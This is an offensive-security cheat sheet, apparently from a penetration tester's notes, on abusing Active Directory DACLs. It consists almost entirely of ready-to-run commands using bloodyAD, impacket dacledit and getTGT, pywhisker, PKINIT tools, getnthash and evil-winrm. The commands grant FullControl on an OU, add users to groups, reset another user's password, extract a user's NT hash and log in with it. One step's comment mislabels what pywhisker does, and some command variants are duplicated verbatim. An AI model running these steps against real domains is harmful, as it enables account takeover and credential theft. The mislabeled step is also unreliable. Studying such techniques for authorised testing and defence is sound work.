DACL (Discretionary Access Control List) Attack
Last modified: 2025-04-19
DACL is a list of the trustees that are allowed or denied access to objects in Active Directory.
Set Ownership of Group
Using BloodyAD, we can set the user as the owner of a group.
# Install if it does not exist on your machine.
pipx install bloodyAD
bloodyAD --host dc.example.local -d example.local -u <username> -p <password> set owner <group-name> <username>
Add Rights
We may be able to take a full control of securable objects by getting GenericAll permission on OU (Organizational Unit).
1. Ask TGT for Kerberos Authentication
If we want to use Kerberos authentication for attacking DACL, we need to retrieve a TGT for specific user at first. In addition, to avoid authentication error, we need to synchronize the system time with the domain controller using ntpdate or rdate.
# Sync datetime with target system
sudo ntpdate <target-ip>
# or
sudo rdate -n <target-ip>
impacket-getTGT -dc-ip <target-ip> example.local/username:password
The getTGT above dumps a .ccache file which stores TGT.
After dumping the .ccache file, set it to an environment variable for using the later processing.
export KRB5CCNAME=username.ccache
2. Read DACL
We can use dacledit of impackets.
To use dacledit, we need to clone the repository and install dependencies as below:
git clone https://github.com/fortra/impacket.git
cd impacket
python3 -m venv .venv
source .venv/bin/activate
pip3 install impacket
pip3 install -r requirements.txt
python3 examples/dacledit.py --help
Note: This repository is updated frequently so errors may occur. If so, try using the git log and git checkout <prev_commit_id> commands to revert to the previous commit and then run it.
Then run the following command:
python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
python3 examples/dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k
3. Write DACL
python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
python3 examples/dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
Abuse
After adding rights, we can abuse it with various methods.
Method 1. Add User to Group → Get TGT → Get NT Hash
# 1. Add user to a specific group (replace the group distinguished name with your target)
bloodyAD --host <target-ip> -u <username> -p <password> add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>
# with Kerberos auth (-k)
bloodyAD --host <target-ip> -u <username> -k add groupMember 'CN=Example Group,CN=Users,DC=EXAMPLE,DC=LOCAL' <username>
# 2. Add the target user to a privileged group
python3 pywhisker.py -d example.local -u <username> -p <password> --target <target-username> --action add
# 3. Obtain a Kerberos TGT using PKINIT authentication with a PFX certificate
python3 gettgtpkinit.py example.local/<target-username> -cert-pfx <pfx-filepath> -pfx-pass <pfx-password> ./example.ccache
export KRB5CCNAME=./example.ccache
# 4. Retrieve the NT hash of the target user using the obtained Kerberos ticket
python3 getnthash.py example.local/<target-username> -key <key>
# 5. Login with the retrieved NT hash
evil-winrm -i <target-ip> -u <target-username> -H <nt-hash>
Method 2. Set Password of Another User
If an user have the permission to set another user password, we can change the password:
bloodyAD --host <target-ip> -u <username> -p <password> set password '<target-username>' '<new-password>'
# with Kerberos auth (-k)
bloodyAD --host <target-ip> -u <username> -k set password '<target-username>' '<new-password>'
After that, we can try further attacks using this user.